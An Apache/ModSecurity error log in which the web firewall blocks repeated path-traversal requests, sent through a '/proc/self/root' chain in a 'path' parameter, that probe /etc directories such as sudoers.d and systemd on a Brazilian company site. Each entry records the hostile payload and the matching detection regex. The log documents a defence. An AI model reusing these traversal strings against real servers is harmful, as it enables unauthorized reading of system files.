[Tue Mar 17 22:35:22.014049 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:43300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBWNa6ubjKNq_cu4Y3NAAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:25.160306 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:43306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBXQkwaGbbGflqUZC0jAAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:26.919507 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:43316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBXsdf6f5d65gmYZRwlwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:28.495661 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:34018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBYBj0p0SRWAqcjGGq6wAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:29.966804 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:34032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBYeyqAr6etmhZHNpXfQAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:31.408376 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:34034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBY4h-PF_25v4hFRCcTQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:39.117820 2026] [proxy_fcgi:error] [pid 17972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52158] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:35:40.482764 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:60782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBbOyqAr6etmhZHNpXfwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:40.684109 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:60782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBbOyqAr6etmhZHNpXgAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:43.089267 2026] [:error] [pid 25836:tid 140411683178240] [client 74.7.241.31:60798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBb4h-PF_25v4hFRCcVAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:44.348771 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:60800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBcOw_le52K8_3pV19jwAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:46.693852 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:60810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBcta6ubjKNq_cu4Y3OgAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:48.168054 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:37272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBdNY0UrI5A3LftIwvlQAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:49.628943 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.241.31:37280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBdRj0p0SRWAqcjGGq9AAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:35:51.085779 2026] [:error] [pid 16560:tid 140411691570944] [client 74.7.241.31:37288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBd66gUSg3B_dEMdIYLAAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:01.131342 2026] [proxy_fcgi:error] [pid 15051:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:52546] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:36:04.266667 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:59062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBhIh-PF_25v4hFRCcWQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:06.752946 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:59064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBhuyqAr6etmhZHNpXgwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:08.280599 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.241.31:58366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBiIh-PF_25v4hFRCcWgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:09.649785 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:58374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBida6ubjKNq_cu4Y3PAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:11.275015 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:58388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBi-w_le52K8_3pV19lQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:12.793658 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:58392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBjMdf6f5d65gmYZRwrQAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:13.200275 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:58392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBjcdf6f5d65gmYZRwrgAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:36:24.105830 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52860] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:36:27.551753 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.241.31:41824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboBm4h-PF_25v4hFRCcXAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
